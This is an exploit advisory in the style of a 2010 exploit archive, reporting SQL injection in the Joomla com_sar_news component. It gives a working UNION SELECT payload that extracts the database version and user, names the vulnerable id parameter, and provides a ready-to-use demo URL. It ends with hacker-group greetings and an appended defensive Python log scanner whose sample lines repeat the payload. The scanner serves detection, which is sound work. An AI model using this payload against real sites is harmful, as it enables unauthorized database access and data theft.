Joomla Component com_sar_news SQL Injection Vulnerability
2010-06-03 16:03:13
# Exploit Title: Joomla com_sar_news SQL Injection vulnerability
# Date: 02 June 2010
# Author: LyNx ([email protected])
# Platform / Tested on: Windows XP 2
# category: webapps/0day
# Code :
==== SQLI EXPLOIT ====
/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
==== VULN IN HERE ====
http://localhost/joomla/index.php?option=com_sar_news&id=80[c0de]&sort_by=ordering
==== LIVE DEMO ====
http://localhost/joomla/index.php?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*&sort_by=ordering
[x]-------------------------------------------------------------------
Thanks To :
system_rt0, bobyhikaru, kamtiEz, r3m1ck, otong, bumble_be, anharku,
virgi, ranggamaggic, shadowsmaker
suddent_death, pl4nkt0n, pokeng, demnas, Xr0b0t, all crew indonesia
hacker and all outsider...
[x]-------------------------------------------------------------------
[x] www.indonesianhacker.or.id
[x] strong, we shine
[x]-------------------------------------------------------------------
Fixes
No fixes
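
With no fix listed, one thing a defender can do is review web-server access logs for com_sar_news requests whose id parameter is not a plain integer, since that parameter is where the advisory places the injection. This is an added example, not part of the original advisory; the combined-log format, the constructed sample lines and the function name suspicious_requests are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory or a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2010:16:00:01 +0000] "GET /joomla/index.php'
    '?option=com_sar_news&id=80&sort_by=ordering HTTP/1.1" 200 5120',
    '203.0.113.9 - - [03/Jun/2010:16:00:07 +0000] "GET /joomla/index.php'
    '?option=com_sar_news&id=80/**/AND/**/1=2/**/UNION/**/SELECT/**/1,version(),3/*'
    '&sort_by=ordering HTTP/1.1" 200 4988',
    '203.0.113.9 - - [03/Jun/2010:16:00:09 +0000] "GET /joomla/index.php'
    '?option=com_sar_news&id=80%20UNION%20SELECT%201 HTTP/1.1" 200 4990',
    '203.0.113.7 - - [03/Jun/2010:16:00:12 +0000] "GET /joomla/index.php'
    '?option=com_content&id=12 HTTP/1.1" 200 7001',
]

# Request line as written in common/combined log format (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A legitimate id is assumed to be ASCII digits only.
INTEGER_RE = re.compile(r'[0-9]+')


def suspicious_requests(lines):
    """Return (client_ip, decoded_id) for com_sar_news requests with a non-integer id."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        # parse_qs percent-decodes values, so encoded payloads are caught too.
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "com_sar_news" not in params.get("option", []):
            continue
        for value in params.get("id", []):
            if not INTEGER_RE.fullmatch(value):
                client_ip = line.split(" ", 1)[0]
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

The same integer-only rule, applied to id before it reaches the component, works as a stopgap input filter; parameters sent in a POST body do not appear in access logs and need a separate check.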